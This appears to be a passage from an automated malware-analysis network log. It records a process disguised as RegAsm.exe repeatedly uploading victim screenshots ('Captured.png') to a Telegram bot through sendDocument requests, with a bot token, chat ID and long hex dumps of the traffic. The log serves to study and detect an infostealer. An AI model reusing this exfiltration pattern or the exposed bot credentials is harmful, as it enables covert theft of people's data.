                                                                            2025-01-09 10:38:56 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:56 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:56 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:57 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:57 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.449811149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:59 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd33a50f73e733
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695916
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:59 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 61 35 30 66 37 33 65 37 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd33a50f73e733Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:59 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:59 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:59 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:59 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:59 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:59 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:59 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:59 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:59 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:39:00 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:00 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.449828149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:39:01 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd33f222aad1da
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:39:01 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 66 32 32 32 61 61 64 31 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd33f222aad1daContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:39:01 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:39:01 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:39:01 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
